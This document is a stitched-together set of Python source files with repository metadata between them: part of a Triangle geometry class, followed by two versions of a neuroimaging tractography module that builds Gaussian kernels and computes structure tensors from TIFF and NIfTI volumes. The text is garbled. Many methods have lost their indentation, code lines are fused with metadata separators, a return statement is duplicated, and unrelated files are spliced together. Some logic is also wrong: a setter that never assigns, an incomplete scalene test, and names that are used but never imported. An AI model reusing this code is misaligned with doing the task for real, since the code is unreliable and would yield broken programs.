    def altitudes(self):
        '''
        A list of the altitudes of each vertex [AltA, AltB, AltC], list of
        floats.
        An altitude is the shortest distance from a vertex to the side
        opposite of it.
        '''
        # From area = (base * height) / 2: height = 2 * area / base.
        a = self.area * 2
        return [a / self.a, a / self.b, a / self.c]
    @property
    def isCCW(self):
        '''
        True if ABC has a counter-clockwise rotation, boolean.
        '''
        return self.A.isCCW(self.B, self.C)
    @property
    def ccw(self):
        '''
        Result of ccw(A,B,C), float.
        '''
        return self.A.ccw(self.B, self.C)
    @property
    def area(self):
        '''
        Area of the triangle, float.
        Performance note: computed via Point.ccw (subtractions and
        multiplications).
        '''
        # |ccw| is twice the triangle's area.
        return abs(self.ccw) / 2
@property
def heronsArea(self):
'''
Heron's forumla for computing the area of a triangle, float.
Performance note: contains a square root.
'''
s = self.semiperimeter
return math.sqrt(s * ((s - self.a) * (s - self.b) * (s - self.c)))
    @property
    def perimeter(self):
        '''
        Perimeter of the triangle: |AB|+|BC|+|AC|, float.
        '''
        return sum(self.sides)
    @property
    def semiperimeter(self):
        '''
        Semiperimeter of the triangle: (|AB|+|BC|+|AC|) / 2, float.
        '''
        return self.perimeter / 2
@property
def isEquilateral(self):
'''
True if all sides of the triangle are the same length.
All equilateral triangles are also isosceles.
All equilateral triangles are also acute.
'''
if not nearly_eq(self.a, self.b):
return False
if not nearly_eq(self.b, self.c):
return False
return nearly_eq(self.a, self.c)
@property
def isIsosceles(self):
'''
True if two sides of the triangle are the same length.
'''
if self.a == self.b:
return True
if self.a == self.c:
return True
return self.b == self.c
@property
def isScalene(self):
'''
True if all sides are unequal in length.
'''
return self.a != self.b != self.c
@property
def isRight(self):
'''
True if one angle is equal to Pi/2 radians.
'''
return any([nearly_eq(Half_Pi, a) for a in self.angles])
@property
def isObtuse(self):
'''
True if one angle is greater than Pi/2 radians.
'''
return any([a > Half_Pi for a in self.angles])
@property
def isAcute(self):
'''
True if all angles are less than 90 degrees ( Pi/2 radians).
'''
return all([a < Half_Pi for a in self.angles])
    def __str__(self):
        # Renders the three vertices by repr, e.g. "A=Point(...), B=..., C=...".
        # if the mapping behavior stays in
        # candidate for pointcollection
        # return ', '.join(['{}=({})'.format(l,p) for l,p in self])
        return 'A={t.A!r}, B={t.B!r}, C={t.C!r}'.format(t=self)
    def __repr__(self):
        # Constructor-style representation wrapping __str__.
        return '{o.__class__.__name__}({o!s})'.format(o=self)
    #
    # XXX treating a triangle like a mapping, not sure about this.
    #
    def __len__(self):
        # A triangle always has exactly three vertices.
        return 3
    def __iter__(self):
        # Yields (label, vertex) pairs: ('A', A), ('B', B), ('C', C).
        return zip(self.vertexNames, self.vertices)
def __getitem__(self, key):
'''
'''
if key in ['A', 0]:
return self.A
if key in ['B', 1]:
return self.B
if key in ['C', 2]:
return self.C
raise KeyError(key)
def __setitem__(self, key, newValue):
if key in ['A', 0]:
return self.A
if key in ['B', 1]:
return self.B
if key in ['C', 2]:
return self.C
raise KeyError(key)
##
# end of mapping gorp
##
def __eq__(self, other):
'''
x == y
True iff len(set(x.vertices).difference(set(y.vertices))) == 0
The ordering of points in either Triangle is not considered.
'''
a = set(self.vertices)
b = set(other.vertices)
return len(a.difference(b)) == 0
    def congruent(self, other):
        '''
        True iff all self and other angles are equal AND
        all self and other sides are equal.
        '''
        # NOTE(review): set() collapses duplicate values, so both triangles
        # must collapse the same way; also this uses exact float equality
        # rather than nearly_eq -- verify that is intended.
        a = set(self.angles)
        b = set(other.angles)
        if len(a) != len(b) or len(a.difference(b)) != 0:
            return False
        a = set(self.sides)
        b = set(other.sides)
        return len(a) == len(b) and len(a.difference(b)) == 0
    def __contains__(self, point):
        '''
        :param: point - Point subclass
        :return: boolean
        True if point is inside the triangle or on any of its sides.
        '''
        # The point is inside iff it is on the same side of all three
        # edges; mixed CCW results mean it is outside.
        try:
            r = [self.A.isCCW(self.B, point),
                 self.B.isCCW(self.C, point),
                 self.C.isCCW(self.A, point)]
        except CollinearPoints:
            # point is on the lines AB, BC, or CA and that counts.
            return True
        return not (any(r) and not all(r))
    def swap(self, side='AB', inplace=False):
        '''
        :side: - optional string
        :inplace: - optional boolean
        :return: Triangle with flipped side.
        The optional side parameter should have one of three values:
        AB, BC, or AC.
        Changes the order of the triangle's points, swapping the
        specified points. Doing so will change the results of isCCW
        and ccw.
        '''
        # The xyz tuples are captured before reassignment so the in-place
        # vertex updates below don't clobber each other.
        try:
            flipset = {'AB': (self.B.xyz, self.A.xyz, self.C.xyz),
                       'BC': (self.A.xyz, self.C.xyz, self.B.xyz),
                       'AC': (self.C.xyz, self.B.xyz, self.A.xyz)}[side]
        except KeyError as e:
            # Re-raised with the offending key as its message.
            raise KeyError(str(e))
        if inplace:
            self.ABC = flipset
            return self
        return Triangle(flipset)
def doesIntersect(self, other):
'''
:param: other - Triangle or Line subclass
:return: boolean
Returns True iff:
Any segment in self intersects any segment in other.
'''
otherType = type(other)
if issubclass(otherType, Triangle):
for s in self.segments.values():
for q in other.segments.values():
if s.doesIntersect(q):
return True
return False
if issubclass(otherType, Line):
for s in self.segments.values():
if s.doesIntersect(other):
return True
return False
msg = "expecting Line or Triangle subclasses, got '{}'"
raise TypeError(msg.format(otherType))
# arithmetic methods
# s = scalar
# t = Triangle()
# u = Triangle()
# p = Point()
#
# t op s -> apply op to vertices using scalar
# t op p -> apply op to vertices using point
# t op u -> apply op to corresponding vertices (?)
#
# should be moved out to a parent ngon class
# maybe pointcollection?
| {
"repo_name": "JnyJny/Geometry",
"path": "Geometry/triangle.py",
"copies": "1",
"size": "20631",
"license": "mit",
"hash": 3652244357389421600,
"line_mean": 23.1298245614,
"line_max": 82,
"alpha_frac": 0.5263923222,
"autogenerated": false,
"ratio": 3.986666666666667,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5013058988866667,
"avg_score": null,
"num_lines": null
} |
# A Python implementation of Ailey's matlab tensor code.
import os
import numpy as np
import math
import SimpleITK as sitk
from scipy import ndimage
import nibabel as nib
from PIL import Image
import scipy.misc
from scipy import signal
import warnings
#warnings.filterwarnings("ignore")
def doggen(sigma):
    """
    Helper function to generate derivatives of Gaussian kernels, in either 1D, 2D, or 3D.
    Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
    :param sigma: Sequence of 1-3 sigma values, one per kernel dimension
                  (see defaults in generate_FSL_structure_tensor).
    :return: Derivative of Gaussian kernel with dimensions of sigma.
    :raises ValueError: if more than 3 sigmas are supplied.
    """
    # BUG FIX: range() requires ints; the previous np.single() floats raised
    # TypeError on Python 3. halfsize is integral after ceil, so int() is exact.
    halfsize = int(np.ceil(3 * np.max(sigma)))
    x = range(-halfsize, halfsize + 1)  # Python colon is not inclusive at end, while MATLAB is.
    dim = len(sigma)
    if dim == 1:
        # BUG FIX: was '2 * sigma**2' -- sigma is a sequence, so ** raised
        # TypeError; index the single sigma value instead.
        X = np.array(x).astype(float)  # numpy arrays are elementwise multiplicative
        k = -X * np.exp(-X**2 / (2 * sigma[0]**2))
    elif dim == 2:
        [X, Y] = np.meshgrid(x, x)
        X = X.astype(float)
        Y = Y.astype(float)
        # BUG FIX: 'sigma[0]^2' was bitwise XOR (TypeError on floats) and the
        # Y factor was missing its sigma; follow the per-axis pattern of the
        # 3D branch below (and of gaussgen).
        k = -X * np.exp(-X**2 / (2 * sigma[0]**2)) * np.exp(-Y**2 / (2 * sigma[1]**2))
    elif dim == 3:
        [X, Y, Z] = np.meshgrid(x, x, x)
        X = X.transpose(0, 2, 1)  # Obtained through vigorous testing (see below...)
        Y = Y.transpose(2, 0, 1)
        Z = Z.transpose(2, 1, 0)
        X = X.astype(float)
        Y = Y.astype(float)
        Z = Z.astype(float)
        k = (-X * np.exp(np.divide(-np.power(X, 2), 2 * np.power(sigma[0], 2)))
             * np.exp(np.divide(-np.power(Y, 2), 2 * np.power(sigma[1], 2)))
             * np.exp(np.divide(-np.power(Z, 2), 2 * np.power(sigma[2], 2))))
    else:
        # BUG FIX: previously printed a warning and fell through to an
        # undefined 'k' (NameError); fail loudly instead.
        raise ValueError('Only supports up to 3 dimensions')
    # Normalize so the absolute values of the kernel sum to 1.
    return np.divide(k, np.sum(np.abs(k[:])))
def gaussgen(sigma):
    """
    Function to generate Gaussian kernels, in 1D, 2D and 3D.
    Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015
    :param sigma: Sequence of 1-3 sigma values, one per kernel dimension
                  (see defaults in generate_FSL_structure_tensor).
    :return: Gaussian kernel with dimensions of sigma, normalized to sum to 1.
    :raises ValueError: if more than 3 sigmas are supplied.
    """
    # BUG FIX: range() requires ints; np.single() floats raised TypeError.
    halfsize = int(np.ceil(3 * max(sigma)))
    x = range(-halfsize, halfsize + 1)
    dim = len(sigma)
    if dim == 1:
        # BUG FIX: 'x.astype' on a range object and 'sigma ^ 2' (bitwise XOR
        # on a sequence) both raised TypeError; mirror the 2D/3D branches.
        X = np.array(x).astype(float)
        k = np.exp(-X**2 / (2 * sigma[0]**2))
    elif dim == 2:
        [X, Y] = np.meshgrid(x, x)
        X = X.astype(float)
        Y = Y.astype(float)
        k = np.exp(-X**2 / (2 * sigma[0]**2)) * np.exp(-Y**2 / (2 * sigma[1]**2))
    elif dim == 3:
        [X, Y, Z] = np.meshgrid(x, x, x)
        X = X.transpose(0, 2, 1)  # Obtained through vigorous testing (see below...)
        Y = Y.transpose(2, 0, 1)
        Z = Z.transpose(2, 1, 0)
        X = X.astype(float)
        Y = Y.astype(float)
        Z = Z.astype(float)
        k = (np.exp(-X**2 / (2 * sigma[0]**2))
             * np.exp(-Y**2 / (2 * sigma[1]**2))
             * np.exp(-Z**2 / (2 * sigma[2]**2)))
    else:
        # BUG FIX: previously printed and fell through to an undefined 'k'.
        raise ValueError('Only supports up to dimension 3')
    return np.divide(k, np.sum(np.abs(k)))
def tiff_to_array(folder_path, input_path):
    """
    Function takes a single image (TIFF, or other also works), and returns
    the single image as a numpy array. Called by tiff_stack_to_array.
    :param folder_path: Directory containing the image; naively concatenated
                        with input_path, so it must end with a path separator.
    :param input_path: Single image file to open.
    :return: Numpy representation of image.
    """
    # The convert tag makes sure that we're dealing with floats, not uint8
    # This prevents underflow.
    im = Image.open(folder_path + input_path).convert("F")
    # im.show()
    imarray = np.array(im)
    # print(imarray)
    # print(imarray.dtype)
    return imarray
def tiff_stack_to_array(input_path):
    """
    Function takes input_path, which should should lead to a directory.
    Loads all TIFFs in input_path, then generates numpy arrays from the
    TIFF stack by calling tiff_to_array helper function.
    :param input_path: Folder or directory containing .tiff stack.
    :return: Numpy array of tiff stack (slices stacked along axis 2).
    """
    im_list = []
    # BUG FIX: os.listdir() returns entries in arbitrary order, but the
    # docstring requires the stack to be assembled in filename order; sort
    # the names. NOTE(review): this is lexicographic -- zero-pad the slice
    # numbers (e.g. token_007.tiff) for true numerical ordering.
    for filename in sorted(os.listdir(input_path)):
        if filename.endswith(".tiff"):
            im_arr = tiff_to_array(input_path, filename)
            im_list.append(im_arr)
    s = np.stack(im_list, axis=2)
    print(s.shape)
    return s
def nii_to_tiff_stack(input_path, token):
    """
    Function loads an nii using SITK, then converts the nii into a folder containing a TIFF stack.
    This function is useful later on for generating the structure tensor.
    :param input_path: Path to .nii file.
    :param token: Name of token; used as the output directory prefix
                  ('<token>_TIFFs') and the per-slice filename prefix.
    """
    image = sitk.ReadImage(input_path);
    planes_number = image.GetSize();
    data = sitk.GetArrayFromImage(image)
    # SITK reports size as (x, y, z); the z extent is index 2.
    z_dimension = planes_number[2];
    ## if we have (i, j, k), we want (k, j, i) (converts nibabel format to sitk format)
    ##new_im = aut_1367.swapaxes(0,2) # just swap i and k
    if not os.path.exists(token + "_TIFFs"):
        os.makedirs(token + "_TIFFs");
    plane = 0;
    # One TIFF per z-plane, named <token>_<plane>.tiff.
    # NOTE(review): scipy.misc.toimage was removed in SciPy >= 1.2; this
    # requires an old SciPy (or porting to PIL.Image.fromarray).
    for plane in range(0, z_dimension):
        output = data[plane, :, :]
        scipy.misc.toimage(output).save(token + "_TIFFs/" + token + "_" + str(plane) + '.tiff')
def generate_FSL_structure_tensor(img_data, filename, dogsigmaArr=[1], gausigmaArr=[2.3], angleArr=[25]):
    """
    Function takes a numpy array (from TIFF_stack_to_array) and saves output
    FSL structure tensor as filename string. Allows inputting alternate dogsigmaArr,
    gausigmaArr, angleArr, although defaults to currently to parameters from MATLAB script.
    Also returns tensorfsl (the tensor fsl structure) image numpy array.
    ## Parameters (the script loops through all parameters and saves each result automatically)
    # dogsigmaArr = [1]; Sigma values for derivative of gaussian filter, recommended value: 0.6 - 1.3 (based on actual data)
    # gausigmaArr = [2.3]; Sigma values for gaussian filter, recommended value: 1.3 - 2.3 (based on actual data)
    # angleArr = [25]; Angle thresholds for fiber tracking, recommended value: 20 - 30.
    Follows code from MATLAB CAPTURE scripts.
    :param img_data: Numpy array of image, typically from tiff_stack_to_array called on a directory of TIFFs.
    :param filename: Name to save the FSL structure tensor as.
    :param dogsigmaArr: Sigma values for derivative of Gaussian filter, with recommended values between 0.6 - 1.3.
    :param gausigmaArr: Sigma values for Gaussian filter, with recommended values between 1.3 - 2.3.
    :param angleArr: Angle threshold for fiber tracking, with recommended values between 20 - 30.
    :return tensorfsl: TensorFSL format of structure tensor (upper triangular matrix)
    """
    # NOTE(review): mutable default arguments are shared across calls; they
    # are read-only here, but safer as None-defaults. angleArr is accepted
    # but never used in this function. This is Python 2 code (print
    # statements throughout).
    for jj in range(len(dogsigmaArr)):
        dogsigma = dogsigmaArr[jj];
        print "Start DoG Sigma on " + str(dogsigma);
        # Generate dog kernels
        dogkercc = doggen([dogsigma, dogsigma, dogsigma]);
        dogkercc = np.transpose(dogkercc, (0, 2, 1)); # annoying
        #print dogkercc.shape;
        #print dogkercc[:, :, 0];
        # Row/column/z variants of the kernel are axis permutations of one
        # another. NOTE(review): dogkerzz applies (0, 2, 1) to the already
        # permuted dogkercc, i.e. it equals the *original* doggen output --
        # confirm this matches the MATLAB source.
        dogkerrr = np.transpose(dogkercc, (1, 0, 2));
        #print dogkerrr[:, :, 0];
        dogkerzz = np.transpose(dogkercc, (0, 2, 1));
        #print dogkerzz[:, :, 0];
        # Compute gradients
        grr = signal.convolve(img_data, dogkerrr, 'same');
        #print grr[:, :, 0];
        gcc = signal.convolve(img_data, dogkercc, 'same');
        #print gcc[:, :, 0];
        gzz = signal.convolve(img_data, dogkerzz, 'same');
        #print gzz[:, :, 0];
        # Compute gradient products (the six unique entries of the outer
        # product of the gradient with itself).
        gprrrr = np.multiply(grr, grr);
        #print gprrrr[:, :, 0];
        gprrcc = np.multiply(grr, gcc);
        #print gprrcc[:, :, 0];
        gprrzz = np.multiply(grr, gzz);
        #print gprrzz[:, :, 0]
        gpcccc = np.multiply(gcc, gcc);
        gpcczz = np.multiply(gcc, gzz);
        gpzzzz = np.multiply(gzz, gzz);
        # Compute gradient amplitudes
        # print ga.dtype;
        ga = np.sqrt(gprrrr + gpcccc + gpzzzz);
        #print ga[:, :, 0];
        #print "GA SHAPE:"
        #print ga.shape;
        # Convert numpy ndarray object to Nifti data type
        gradient_amplitudes_data = nib.Nifti1Image(ga, affine=np.eye(4));
        # Save gradient amplitudes image
        nib.save(gradient_amplitudes_data, 'gradient_amplitudes.nii');
        # Compute gradient vectors (unit gradient direction per voxel;
        # voxels with zero amplitude divide by zero and produce NaN/inf).
        gv = np.concatenate((grr[..., np.newaxis], gcc[..., np.newaxis], gzz[..., np.newaxis]), axis = 3);
        #print gv[:, :, 0, 0];
        gv = np.divide(gv, np.tile(ga[..., None], [1, 1, 1, 3]));
        #print gv[:, :, 0, 1];
        #print "GV SHAPE:"
        #print gv.shape;
        # Convert numpy ndarray object to Nifti data type
        gradient_vectors_data = nib.Nifti1Image(gv, affine=np.eye(4));
        # Save gradient vectors
        nib.save(gradient_vectors_data, 'gradient_vectors.nii');
        # Compute structure tensor: Gaussian-blur each gradient product.
        for kk in range(len(gausigmaArr)):
            gausigma = gausigmaArr[kk];
            print "Start Gauss Sigma with gausigma = " + str(gausigma);
            print "Generating Gaussian kernel..."
            gaussker = np.single(gaussgen([gausigma, gausigma, gausigma]));
            #print gaussker[:, :, 0];
            print "Blurring gradient products..."
            gprrrrgauss = signal.convolve(gprrrr, gaussker, "same");
            #print gprrrrgauss[:, :, 0];
            gprrccgauss = signal.convolve(gprrcc, gaussker, "same");
            #print gprrccgauss[:, :, 0];
            gprrzzgauss = signal.convolve(gprrzz, gaussker, "same");
            gpccccgauss = signal.convolve(gpcccc, gaussker, "same");
            gpcczzgauss = signal.convolve(gpcczz, gaussker, "same");
            print "Saving a copy for this Gaussian sigma..."
            # Stack the six blurred products, then swap components 2 and 3
            # to move from lower- to FSL's upper-triangular ordering.
            tensorfsl = np.concatenate((gprrrrgauss[..., np.newaxis], gprrccgauss[..., np.newaxis], gprrzzgauss[..., np.newaxis], gpccccgauss[..., np.newaxis], gpcczzgauss[..., np.newaxis], gpzzzzgauss[..., np.newaxis]), axis = 3);
            tmp = np.copy(tensorfsl[:,:,:,3])
            tensorfsl[:,:,:,3] = tensorfsl[:,:,:,2]
            tensorfsl[:,:,:,2] = tmp
            # Convert numpy ndarray object to Nifti data type
            tensor_fsl_data = nib.Nifti1Image(tensorfsl, affine=np.eye(4));
            nib.save(tensor_fsl_data, str(filename) + "dogsigma_" + str(jj) + "gausigma_" + str(kk) + 'tensorfsl.nii');
    print 'Completed computing structure tensor on ' + str(filename) + '!'
    # Only the tensor from the final (dogsigma, gausigma) combination is
    # returned; earlier combinations exist only as saved .nii files.
    return tensorfsl
def plot_rgb(im):
    """
    Render a 3x3 grid of sagittal/coronal/axial RGB slices from a 3D+RGB
    volume and return the matplotlib figure.
    :param im: 4D array (x, y, z, channels); channels 0:3 are plotted.
    :return: the current matplotlib figure, resized to 12.5 x 10.5 inches.
    NOTE(review): 'plt' (matplotlib.pyplot) is never imported in this
    module, so this function raises NameError as written; it also uses a
    Python 2 print statement below.
    """
    plt.rcParams.update({'axes.labelsize': 'x-large',
                         'axes.titlesize': 'x-large'})
    # Hard-coded slice positions for the standard MNI 182x218x182 volume;
    # anything else gets slices at 35%/51%/65% of each extent.
    if im.shape == (182, 218, 182):
        x = [78, 90, 100]
        y = [82, 107, 142]
        z = [88, 103, 107]
    else:
        shap = im.shape
        x = [int(shap[0]*0.35), int(shap[0]*0.51), int(shap[0]*0.65)]
        y = [int(shap[1]*0.35), int(shap[1]*0.51), int(shap[1]*0.65)]
        z = [int(shap[2]*0.35), int(shap[2]*0.51), int(shap[2]*0.65)]
    coords = (x, y, z)
    labs = ['Sagittal Slice (YZ fixed)',
            'Coronal Slice (XZ fixed)',
            'Axial Slice (XY fixed)']
    var = ['X', 'Y', 'Z']
    idx = 0
    for i, coord in enumerate(coords):
        for pos in coord:
            idx += 1
            ax = plt.subplot(3, 3, idx)
            ax.set_title(var[i] + " = " + str(pos))
            # Sagittal/coronal slices are rotated 90 degrees for display.
            if i == 0:
                image = ndimage.rotate(im[pos, :, :,0:3], 90)
            elif i == 1:
                image = ndimage.rotate(im[:, pos, :,0:3], 90)
            else:
                image = im[:, :, pos,0:3]
            print image.shape
            # Only the first column of each row gets a y-axis label.
            if idx % 3 == 1:
                ax.set_ylabel(labs[i])
            ax.yaxis.set_ticks([0, image.shape[0]/2, image.shape[0] - 1])
            ax.xaxis.set_ticks([0, image.shape[1]/2, image.shape[1] - 1])
            plt.imshow(image)
    fig = plt.gcf()
    fig.set_size_inches(12.5, 10.5, forward=True)
    return fig
def fiber_stream(f):
    """
    Plot every fiber's coordinates projected onto the XY, XZ and YZ planes
    and save the result as 'tensor_streamlines.png'.
    :param f: iterable of fibers; each fiber indexes as an (N, 3) array.
    NOTE(review): 'plt' (matplotlib.pyplot) is never imported in this
    module (NameError as written); also note plt.subplots() below opens a
    *second* figure, while 'fig' (figure 1) is the one saved -- verify the
    intended figure is written out.
    """
    test = f
    print len(test)
    fig = plt.figure(1)
    plt.subplots(figsize=(10, 10))
    plt.subplot(311)
    plt.title("Y-axis vs X-axis (" + str(len(test)) + " fibers)")
    for i in range(len(test)):
        plt.plot(test[i][:,0], test[i][:,1])
    plt.subplot(312)
    plt.title("Z-axis vs X-axis (" + str(len(test)) + " fibers)")
    for i in range(len(test)):
        plt.plot(test[i][:,0], test[i][:,2])
    plt.subplot(313)
    plt.title("Z-axis vs Y-axis (" + str(len(test)) + " fibers)")
    for i in range(len(test)):
        plt.plot(test[i][:,1], test[i][:,2])
    plt.tight_layout()
    #fig = plt.show()
    fig.savefig('tensor_streamlines.png')
def tensor2tract(struct_tensor, is_fsl):
    """
    Convert a structure tensor volume into EuDX streamlines (and save RGB
    FA renderings along the way).
    :param struct_tensor: 4D numpy array of triangular tensor components;
        modified in place when is_fsl is True.
    :param is_fsl: if True, swap components 2 and 3 to undo FSL's
        upper-triangular ordering before decomposition.
    :return: list of streamlines produced by EuDX.
    NOTE(review): this function references several names never defined or
    imported in this module (from_lower_triangular, decompose_tensor,
    fractional_anisotropy, color_fa, quantize_evecs, get_sphere, EuDX,
    'result', 'nb', 'plt') -- presumably dipy, nibabel and matplotlib
    imports were lost; restore them before calling this.
    """
    # BUG FIX: the 'def' keyword was missing from this line, which was a
    # SyntaxError that made the entire module unimportable.
    if is_fsl:
        tmp = np.copy(struct_tensor[:,:,:,3])
        struct_tensor[:,:,:,3] = struct_tensor[:,:,:,2]
        struct_tensor[:,:,:,2] = tmp
    output = from_lower_triangular(struct_tensor)
    evals, evecs = decompose_tensor(output)
    FA = fractional_anisotropy(evals)
    RGB = color_fa(FA, evecs)
    # nb.save(nb.Nifti1Image(np.array(255 * RGB, 'uint8'), result.get_affine()), 'fsl_tensor_rgb_upper.nii.gz')
    affine = result.get_affine()
    fa = nb.Nifti1Image(np.array(255 * RGB, 'uint8'), affine)
    im = fa.get_data()
    fig = plot_rgb(im)
    plt.savefig('tensor_field_brain.png')
    sphere = get_sphere('symmetric724')
    peak_indices = quantize_evecs(evecs, sphere.vertices)
    eu = EuDX(FA.astype('f8'), peak_indices, seeds=50000, odf_vertices = sphere.vertices, a_low=0.2)
    tensor_streamlines = [streamline for streamline in eu]
    return tensor_streamlines
return tensor_streamlines | {
"repo_name": "NeuroDataDesign/seelviz",
"path": "jon/algorithms/tractography.py",
"copies": "1",
"size": "13942",
"license": "apache-2.0",
"hash": 8109679874346526000,
"line_mean": 34.4783715013,
"line_max": 231,
"alpha_frac": 0.5839190934,
"autogenerated": false,
"ratio": 3.257476635514019,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.43413957289140187,
"avg_score": null,
"num_lines": null
} |
# A python implementation of Ailey's matlab tensor code.
import os
import numpy as np
import math
import SimpleITK as sitk
from scipy import ndimage
import nibabel as nib
from PIL import Image
import scipy.misc
from scipy import signal
import warnings
warnings.filterwarnings("ignore")
def doggen(sigma):
    """
    Generate a derivative-of-Gaussian kernel in 1D, 2D, or 3D.

    Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015

    Fixes over the original: `range()` cannot take floats (use np.arange);
    the 1-D path used `sigma ** 2` on a list instead of `sigma[0] ** 2`; the
    2-D path used `^` (bitwise xor) instead of `**` and dropped the sigma[1]
    term entirely.

    :param sigma: Sequence of sigmas, one per dimension (1, 2 or 3 entries).
    :return: Kernel normalized so that sum(abs(k)) == 1.
    :raises ValueError: for more than 3 dimensions.
    """
    halfsize = int(np.ceil(3 * np.max(sigma)))
    # Python ranges exclude the endpoint while MATLAB's colon includes it.
    x = np.arange(-halfsize, halfsize + 1, dtype=float)
    dim = len(sigma)
    if dim == 1:
        X = np.array(x)
        k = -X * np.exp(-X ** 2 / (2 * sigma[0] ** 2))
    elif dim == 2:
        X, Y = np.meshgrid(x, x)
        X = X.astype(float)
        Y = Y.astype(float)
        k = -X * np.exp(-X ** 2 / (2 * sigma[0] ** 2)) * np.exp(-Y ** 2 / (2 * sigma[1] ** 2))
    elif dim == 3:
        X, Y, Z = np.meshgrid(x, x, x)
        # Axis permutations obtained through vigorous testing (match MATLAB's ndgrid).
        X = X.transpose(0, 2, 1)
        Y = Y.transpose(2, 0, 1)
        Z = Z.transpose(2, 1, 0)
        X = X.astype(float)
        Y = Y.astype(float)
        Z = Z.astype(float)
        k = -X * np.exp(np.divide(-np.power(X, 2), 2 * np.power(sigma[0], 2))) * np.exp(
            np.divide(-np.power(Y, 2), 2 * np.power(sigma[1], 2))) * np.exp(
            np.divide(-np.power(Z, 2), 2 * np.power(sigma[2], 2)))
    else:
        # Original fell through with `k` unbound (NameError); fail explicitly.
        raise ValueError('Only supports up to 3 dimensions')
    return np.divide(k, np.sum(np.abs(k)))
def gaussgen(sigma):
    """
    Generate a Gaussian kernel in 1D, 2D or 3D.

    Source code in MATLAB obtained from Qiyuan Tian, Stanford University, September 2015

    Fixes over the original: `range()` cannot take floats (use np.arange); the
    1-D path called `.astype` on a range object and used `^` (bitwise xor)
    instead of `**`.

    :param sigma: Sequence of sigmas, one per dimension (1, 2 or 3 entries).
    :return: Kernel normalized so its absolute values sum to 1.
    :raises ValueError: for more than 3 dimensions.
    """
    halfsize = int(np.ceil(3 * max(sigma)))
    x = np.arange(-halfsize, halfsize + 1, dtype=float)
    dim = len(sigma)
    if dim == 1:
        k = np.exp(-x ** 2 / (2 * sigma[0] ** 2))
    elif dim == 2:
        X, Y = np.meshgrid(x, x)
        X = X.astype(float)
        Y = Y.astype(float)
        k = np.exp(-X ** 2 / (2 * sigma[0] ** 2)) * np.exp(-Y ** 2 / (2 * sigma[1] ** 2))
    elif dim == 3:
        X, Y, Z = np.meshgrid(x, x, x)
        # Axis permutations obtained through vigorous testing (match MATLAB's ndgrid).
        X = X.transpose(0, 2, 1)
        Y = Y.transpose(2, 0, 1)
        Z = Z.transpose(2, 1, 0)
        X = X.astype(float)
        Y = Y.astype(float)
        Z = Z.astype(float)
        k = np.exp(-X ** 2 / (2 * sigma[0] ** 2)) * np.exp(-Y ** 2 / (2 * sigma[1] ** 2)) * np.exp(
            -Z ** 2 / (2 * sigma[2] ** 2))
    else:
        # Original fell through with `k` unbound (NameError); fail explicitly.
        raise ValueError('Only supports up to dimension 3')
    return np.divide(k, np.sum(np.abs(k)))
def tiff_to_array(folder_path, input_path):
    """
    Load a single image (TIFF, or any other PIL-supported format) and return
    it as a numpy array. Called by tiff_stack_to_array.

    :param folder_path: Directory containing the image.
    :param input_path: Image filename within folder_path.
    :return: Numpy representation of the image.
    """
    # os.path.join works whether or not folder_path ends with a separator;
    # the original naive string concatenation required a trailing slash.
    im = Image.open(os.path.join(folder_path, input_path))
    imarray = np.array(im)
    return imarray
def tiff_stack_to_array(input_path):
    """
    Load all .tiff files in directory input_path and stack them into one numpy
    volume (slices along axis 2) via tiff_to_array.

    Fix: os.listdir returns names in arbitrary order, so filenames are now
    sorted explicitly. Sorting is lexicographic -- zero-pad slice indices in
    filenames so lexicographic order matches slice order.

    :param input_path: Folder or directory containing the .tiff stack.
    :return: Numpy array of the tiff stack.
    """
    im_list = []
    for filename in sorted(os.listdir(input_path)):
        if filename.endswith(".tiff"):
            im_list.append(tiff_to_array(input_path, filename))
    s = np.stack(im_list, axis=2)
    print(s.shape)
    return s
def nii_to_tiff_stack(input_path, token):
    """
    Load an .nii volume with SimpleITK and write each z-plane as a TIFF into a
    "<token>_TIFFs" folder, for later use when generating the structure tensor.

    :param input_path: Path to .nii file.
    :param token: Name of token.
    """
    image = sitk.ReadImage(input_path)
    data = sitk.GetArrayFromImage(image)
    # GetSize() is (i, j, k) in sitk order, while the array is indexed (k, j, i),
    # so the number of z-planes is the third size component.
    z_dimension = image.GetSize()[2]
    out_dir = token + "_TIFFs"
    if not os.path.exists(out_dir):
        os.makedirs(out_dir)
    for plane in range(z_dimension):
        slice_2d = data[plane, :, :]
        scipy.misc.toimage(slice_2d).save(out_dir + "/" + token + "_" + str(plane) + '.tiff')
def generate_FSL_structure_tensor(img_data, filename, dogsigmaArr=[1], gausigmaArr=[2.3], angleArr=[25]):
    """
    Compute an FSL-format structure tensor from an image volume and save each
    intermediate and final result as NIfTI. Returns the last tensor computed.

    Follows code from MATLAB CAPTURE scripts. Fixes over the original: garbled
    Python-2 print statements converted to print() calls, and the return line
    was fused with trailing metadata.

    :param img_data: Numpy volume, typically from tiff_stack_to_array.
    :param filename: Prefix used when saving the structure-tensor NIfTIs.
    :param dogsigmaArr: Derivative-of-Gaussian sigmas, recommended 0.6 - 1.3.
    :param gausigmaArr: Gaussian blur sigmas, recommended 1.3 - 2.3.
    :param angleArr: Angle thresholds for fiber tracking (recorded but unused here).
    :return tensorfsl: TensorFSL structure tensor (upper triangular components).
    """
    for jj in range(len(dogsigmaArr)):
        dogsigma = dogsigmaArr[jj]
        print("Start DoG Sigma on " + str(dogsigma))
        # Generate derivative-of-Gaussian kernels, one per axis.
        dogkercc = doggen([dogsigma, dogsigma, dogsigma])
        dogkercc = np.transpose(dogkercc, (0, 2, 1))  # annoying axis fix-up
        dogkerrr = np.transpose(dogkercc, (1, 0, 2))
        # NOTE(review): this second (0, 2, 1) transpose undoes the one above,
        # making dogkerzz equal the un-fixed kernel -- confirm against the
        # MATLAB reference before changing.
        dogkerzz = np.transpose(dogkercc, (0, 2, 1))
        # Compute gradients by convolution.
        grr = signal.convolve(img_data, dogkerrr, 'same')
        gcc = signal.convolve(img_data, dogkercc, 'same')
        gzz = signal.convolve(img_data, dogkerzz, 'same')
        # Compute gradient products (components of the outer product).
        gprrrr = np.multiply(grr, grr)
        gprrcc = np.multiply(grr, gcc)
        gprrzz = np.multiply(grr, gzz)
        gpcccc = np.multiply(gcc, gcc)
        gpcczz = np.multiply(gcc, gzz)
        gpzzzz = np.multiply(gzz, gzz)
